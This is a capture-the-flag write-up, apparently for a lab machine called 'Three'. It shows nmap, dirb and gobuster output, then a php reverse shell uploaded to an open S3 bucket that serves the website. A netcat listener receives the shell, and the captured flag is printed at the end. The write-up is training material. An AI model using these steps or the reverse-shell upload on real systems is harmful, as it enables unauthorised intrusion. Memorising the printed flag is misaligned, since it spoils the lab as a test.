Port recognition withnmapor you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon three.htb

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤

Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-09 07:18 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:18
Completed NSE at 07:18, 0.00s elapsed
Initiating Ping Scan at 07:18
Scanning three.htb (10.129.67.204) [4 ports]
Completed Ping Scan at 07:18, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:18
Scanning three.htb (10.129.67.204) [65535 ports]
Discovered open port 80/tcp on 10.129.67.204
Discovered open port 22/tcp on 10.129.67.204
Completed SYN Stealth Scan at 07:18, 15.39s elapsed (65535 total ports)
NSE: Script scanning 10.129.67.204.
Initiating NSE at 07:18
Completed NSE at 07:18, 0.00s elapsed
Nmap scan report for three.htb (10.129.67.204)
Host is up (0.070s latency).
Not shown: 63274 closed tcp ports (reset), 2259 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

NSE: Script Post-scanning.
Initiating NSE at 07:18
Completed NSE at 07:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.87 seconds
           Raw packets sent: 76595 (3.370MB) | Rcvd: 66674 (2.667MB)


[i] [Server info]
http://three.htb:80 [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], Email[mail@thetoppers.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.129.67.204], Script, Title[The Toppers]                                                                                                                                                                                                

[+] [fuzzin server]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Aug  9 07:18:43 2022
URL_BASE: http://three.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://three.htb:80/ ----
==> DIRECTORY: http://three.htb:80/images/                                                                                                                                                        
+ http://three.htb:80/index.php (CODE:200|SIZE:11952)                                                                                                                                             
+ http://three.htb:80/server-status (CODE:403|SIZE:274)                                                                                                                                           
                                                                                                                                                                                                  
-----------------
END_TIME: Tue Aug  9 07:24:15 2022
DOWNLOADED: 4612 - FOUND: 2

recon reports two ports 22 for ssh and 80 for http

Inside Contact we found a new domain

┌──(root@ghost)-[/home/ghost]
└─# gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://thetoppers.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/08/09 07:41:06 Starting gobuster in VHOST enumeration mode
===============================================================
Found: s3.thetoppers.htb (Status: 502) [Size: 424]
Found: gc._msdcs.thetoppers.htb (Status: 400) [Size: 306]
                                                         
===============================================================
2022/08/09 07:41:59 Finished
===============================================================

More dns enumeration two domains obtained, after a bit research on the internet we found more information about s3

┌──(root@ghost)-[/home/ghost]
└─# recon s3.thetoppers.htb

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .
                                                                                                                                                                                  
[R3C0N] by 0bfxgh0st 4 WWA with ❤                                                                                                                                                                   

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-09 07:45 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Initiating Ping Scan at 07:45
Scanning s3.thetoppers.htb (10.129.67.204) [4 ports]
Completed Ping Scan at 07:45, 0.08s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:45
Scanning s3.thetoppers.htb (10.129.67.204) [65535 ports]
Discovered open port 80/tcp on 10.129.67.204
Discovered open port 22/tcp on 10.129.67.204
Completed SYN Stealth Scan at 07:45, 14.59s elapsed (65535 total ports)
NSE: Script scanning 10.129.67.204.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Nmap scan report for s3.thetoppers.htb (10.129.67.204)
Host is up (0.088s latency).
rDNS record for 10.129.67.204: three.htb
Not shown: 63546 closed tcp ports (reset), 1987 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

NSE: Script Post-scanning.
Initiating NSE at 07:45
Completed NSE at 07:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 15.02 seconds
           Raw packets sent: 72204 (3.177MB) | Rcvd: 64950 (2.598MB)


[i] [Server info]
http://s3.thetoppers.htb:80 [404 Not Found] Access-Control-Allow-Methods[HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH], Country[RESERVED][ZZ], HTTPServer[hypercorn-h11], IP[10.129.67.204], UncommonHeaders[access-control-allow-origin,access-control-allow-methods,access-control-allow-headers,access-control-expose-headers]

[+] [fuzzin server]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Aug  9 07:45:47 2022
URL_BASE: http://s3.thetoppers.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://s3.thetoppers.htb:80/ ----
+ http://s3.thetoppers.htb:80/graph (CODE:405|SIZE:178)                                                                                                                                            
+ http://s3.thetoppers.htb:80/health (CODE:200|SIZE:888)                                                                                                                                           
+ http://s3.thetoppers.htb:80/server-status (CODE:403|SIZE:282)                                                                                                                                    
                                                                                                                                                                                                   
-----------------
END_TIME: Tue Aug  9 07:53:30 2022
DOWNLOADED: 4612 - FOUND: 3

At this point we can try connect to this with awscli, run aws configure and then you can list

┌──(root@ghost)-[/home/ghost]
└─# aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
                           PRE images/
2022-08-09 10:33:25          0 .htaccess
2022-08-09 10:33:25      11952 index.php

We can upload a php file so let's try upload our favourite shell

┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.10.15.252 1337 > rev.php

Generating reverse shell

┌──(root@ghost)-[/home/ghost]
└─# aws --endpoint=http://s3.thetoppers.htb s3 cp rev.php s3://thetoppers.htb
upload: ./rev.php to s3://thetoppers.htb/rev.php

Uploading our shell

Time to start netcat listener and curl where our rev.php was uploaded in http://thetoppers.htb/rev.php

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.15.252] from three.htb [10.129.227.248] 57930
Linux three 4.15.0-189-generic #200-Ubuntu SMP Wed Jun 22 19:53:37 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
 14:40:45 up 9 min,  0 users,  load average: 0.02, 0.09, 0.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ ls -la /var/www/    
total 16
drwxr-xr-x  3 root root     4096 Jul 19 11:30 .
drwxr-xr-x 13 root root     4096 Jul 19 11:57 ..
-rw-r-----  1 root www-data   33 Jul 19 11:30 flag.txt
drwxr-xr-x  3 root root     4096 Aug  9 14:38 html
$ cat /var/www/flag.txt
a980d99281a28d638ac68b9bf9453c2b